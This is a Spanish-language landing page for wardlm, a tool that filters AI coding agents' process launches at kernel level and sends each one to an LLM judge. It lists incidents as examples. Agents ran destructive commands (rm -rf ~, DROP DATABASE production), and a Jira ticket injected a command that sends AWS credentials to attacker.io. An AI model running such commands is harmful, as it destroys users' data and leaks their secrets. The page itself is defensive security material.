IncidentesArquitecturaEquipoInstalar

Seguridad para agentes
en la capa del sistema operativo.

Wardlm te protege en cada proceso de tus agentes, a nivel kernel.

DescargarGitHub
bash — wardlm
DENY sql_database_destruction
LLM judge + kernel-level
Incidentes reales · 2024–2026

Ya hubo incidentes.
Con herramientas que usás hoy.

INC-001Dic 2025
CRÍTICO
Cursor
rm -rf ~

Sesión de dev normal. Todo el home directory, borrado.

Cursor Forum #129401
bloqueado
INC-002Mar 2026
CRÍTICO
Claude Code
rm -rf ./app ./components ./lib

Pediste un refactor. Perdiste el proyecto.

GitHub Issues #37331
bloqueado
INC-003Jul 2025
CRÍTICO
Replit Agent
DROP DATABASE production

Code freeze activo. No importó.

HN #44632270
bloqueado
INC-004Ago 2025
ALTO
Cursor + Jira MCP
curl attacker.io -d $(cat ~/.aws/credentials)

Un ticket en Jira. Tus AWS keys, afuera.

Snyk Labs
bloqueado
Arquitectura

Cada syscall,
interceptado en el kernel.

Claude Code
Codex
Cursor
GitHub Copilot
Gemini CLI
openclaw
opencode
1execve('/bin/bash', 'rm -rf /')
5execve() resume·aprobado|-EACCES
Linux Kernel

seccomp · BPF filter

Filtro aplicado solo a procesos del agente. Cada syscall execve queda suspendido a la espera de veredicto.

Linux
2SECCOMP_RET_USER_NOTIF
4NOTIF_SEND·CONTINUE|-EACCES
wardlm · userspace

LLM judge — approve/deny

Clasificador binario por cada execve. ~300ms de overhead.

wardlm
3/var/log/wardlm
Electron

Log + Auditoría

Cada decisión registrada para auditoría y revisión posterior.

Electron
MIT · Sin telemetría · Linux kernel 5.0+

Instalá
wardlm.

Un comando. Sin dependencias de cloud.
Tus agentes, contenidos a nivel kernel.

$curl -fsSL https://wardlm.vercel.app/install.sh | bash

Copiado al portapapeles

GitHub
Equipo

Las personas detrás
de wardlm.

Daniel Salmun

Daniel Salmun

Founding Engineer @ Gullie

LinkedIn
Gianfranco Bogetti

Gianfranco Bogetti

Sr. AI/ML Engineer @ Nivii

LinkedIn
Franco Sanchez

Franco Sanchez

Sr. Fullstack Engineer @ Nivii

LinkedIn